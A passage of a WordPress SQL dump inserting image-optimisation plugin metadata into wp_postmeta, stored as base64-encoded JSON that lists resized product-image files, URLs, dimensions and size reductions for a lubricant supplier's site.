C93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0NzcsInRpbWUiOjE0ODM1NjcyMjUsImlkIjoxNjY5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQzLCJ0aW1lIjoxNDgzNTY3MjI4LCJpZCI6MTY2OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ3MiwidGltZSI6MTQ4MzU2NzIzMSwiaWQiOjE2Njl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo3NDAsInRpbWUiOjE0ODM1NjcyMzUsImlkIjoxNjY5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MjMsInRpbWUiOjE0ODM1NjcyMzgsImlkIjoxNjY5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo0NjUsInRpbWUiOjE0ODM1NjcyNDIsImlkIjoxNjY5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29ubmVjdG9yLWx1YnJpY2FudC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2Nvbm5lY3Rvci1sdWJyaWNhbnQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25uZWN0b3ItbHVicmljYW50LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo0OTksInRpbWUiOjE0ODM1NjcyNDYsImlkIjoxNjY5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29338, 1667, 'wpfc_optimisation_reduction', '10966'); 
INSERT INTO `wp_postmeta` VALUES (29339, 1667, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTY3MjUwLCJpZCI6IjE2NjcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTg3LCJ0aW1lIjoxNDgzNTY3MjU0LCJpZCI6MTY2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEwNDUsInRpbWUiOjE0ODM1NjcyNTgsImlkIjoxNjY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6OTc1LCJ0aW1lIjoxNDgzNTY3MjYyLCJpZCI6MTY2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NDU3MSwidGltZSI6MTQ4MzU2NzI2NywiaWQiOjE2Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MDUsInRpbWUiOjE0ODM1NjcyNzAsImlkIjoxNjY3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQwLCJ0aW1lIjoxNDgzNTY3MjczLCJpZCI6MTY2N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ2NSwidGltZSI6MTQ4MzU2NzI3NiwiaWQiOjE2Njd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4ODksInRpbWUiOjE0ODM1NjcyODAsImlkIjoxNjY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MzQsInRpbWUiOjE0ODM1NjcyODQsImlkIjoxNjY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1MzMsInRpbWUiOjE0ODM1NjcyODcsImlkIjoxNjY3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTIweC1rcnl0b3gtZ3JlYXNlLWFlcm9zb2wtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMjB4LWtyeXRveC1ncmVhc2UtYWVyb3NvbC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTEyMHgta3J5dG94LWdyZWFzZS1hZXJvc29sLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1MjIsInRpbWUiOjE0ODM1NjcyOTEsImlkIjoxNjY3fV0='); 
INSERT INTO `wp_postmeta` VALUES (29340, 1665, 'wpfc_optimisation_reduction', '1651722'); 
INSERT INTO `wp_postmeta` VALUES (29341, 1665, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLmpwZyIsIndpZHRoIjoxODAwLCJoZWlnaHQiOjI1NTAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UuanBnIiwicmVkdWN0aW9uIjoxNjUxNzExLCJ0aW1lIjoxNDgzNTY3MzAyLCJpZCI6IjE2NjUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzMwNCwiaWQiOjE2NjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTU2NXg4MDAuanBnIiwid2lkdGgiOjU2NSwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTU2NXg4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTU2NXg4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MzA3LCJpZCI6MTY2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtNzY4eDEwODguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0IjoxMDg4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLTExMHhuYi1rcnl0b3gtb2lsLWdyZWFzZS03Njh4MTA4OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtNzY4eDEwODguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY3MzEwLCJpZCI6MTY2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtMTEyOXgxNjAwLmpwZyIsIndpZHRoIjoxMTI5LCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTExMjl4MTYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy0xMTB4bmIta3J5dG94LW9pbC1ncmVhc2UtMTEyOXgxNjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2NzMxNCwiaWQiOjE2NjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtMTEweG5iLWtyeXRveC1vaWwtZ3JlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1s